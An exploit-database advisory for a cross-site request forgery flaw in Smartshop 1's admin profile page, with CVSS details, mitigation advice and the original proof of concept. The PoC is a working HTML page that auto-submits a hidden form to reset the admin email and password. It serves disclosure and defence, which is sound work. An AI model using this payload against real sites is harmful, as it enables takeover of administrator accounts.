Smartshop 1 - Cross site request forgery

vendor:

Smartshop

by:

L0RD

5.5

CVSS

MEDIUM

Cross site request forgery

352

CWE

Product Name: Smartshop

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Kali linux

2018

Smartshop 1 – Cross site request forgery

This exploit allows an attacker to perform unauthorized actions on behalf of a victim user by tricking them into submitting a malicious form. In this case, the exploit targets the 'editprofile.php' file of the Smartshop software. The form is designed to change the admin password by submitting the email, password, and confirmation fields with predefined values.

Mitigation:

To mitigate this vulnerability, developers should implement CSRF tokens and enforce validation on all form submissions. Additionally, users should be educated about the risks of clicking on suspicious links or submitting forms on untrusted websites.

Source

Exploit-DB raw data:

# Exploit Title: Smartshop 1 - Cross site request forgery
# Date: 2018-06-02
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip
# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website
# Version: 1
# Tested on: Kali linux
=================================================

# POC : CSRF

# Exploit :
# vulnerable file : editprofile.php

<html>
<head>
   <title>Change admin password</title>
</head>
<body>
   <form method="POST" action="http://127.0.0.1/clone/Smartshop-master/admin/editprofile.php">
    <input type="hidden" name="email" value="decode@test.com">
    <input type="hidden" name="password" value="1234">
    <input type="hidden" name="confirmation" value="1234">
   </form>
 <script>
    document.forms[0].submit();
 </script>
</body>
</html>

==================================================